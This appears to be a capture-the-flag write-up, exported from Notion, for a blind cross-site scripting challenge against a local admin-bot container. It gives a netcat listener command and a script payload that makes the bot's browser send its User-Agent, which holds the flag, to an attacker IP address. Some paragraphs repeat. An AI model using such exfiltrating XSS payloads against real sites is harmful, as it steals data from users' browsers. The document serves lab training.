Simple XSS | Notion

Want to run this challenge locally

docker run -d --restart always -p 3555:3555 --name xss-admin-bot joshbeck2024/ctf-xss-admin-bot

These types of challenges are very common. We have an admin ‘bot’ that acts as a shadow user. It will browse the website you are attempting to compromise. The goal: Exploit the shadow user’s browser via XSS or a similar attack.

We are told that an admin will view our message every minute. We can assume a bot is active. This is blind XSS because we won’t be able to see anything directly. We’ll need to set up a listener and force the shadow user’s browser to make a request to that listener.

Spin up a `nc` (netcat) listener on Kali

nc -lvnp 9001

Payload:

<script>
// Using fetch (may require CORS to be loose or mode: 'no-cors')      
fetch('<http://192.168.228.7:9001/?ua=>' + encodeURIComponent(navigator.userAgent)); 
// Alternatively, using specific window redirection which is often more reliable for simple exfiltration      
// window.location = '<http://192.168.229.149:9001/?ua=>' + encodeURIComponent(navigator.userAgent);    
</script>

Want to run this challenge locally

These types of challenges are very common. We have an admin ‘bot’ that acts as a shadow user. It will browse the website you are attempting to compromise. The goal: Exploit the shadow user’s browser via XSS or a similar attack.

We are told that an admin will view our message every minute. We can assume a bot is active. This is blind XSS because we won’t be able to see anything directly. We’ll need to set up a listener and force the shadow user’s browser to make a request to that listener.

Spin up a nc (netcat) listener on Kali

The flag will appear in the User-Agent header once the bot checks your message and executes the malicious <script>

Spin up a `nc` (netcat) listener on Kali

The flag will appear in the `User-Agent` header once the bot checks your message and executes the malicious <script>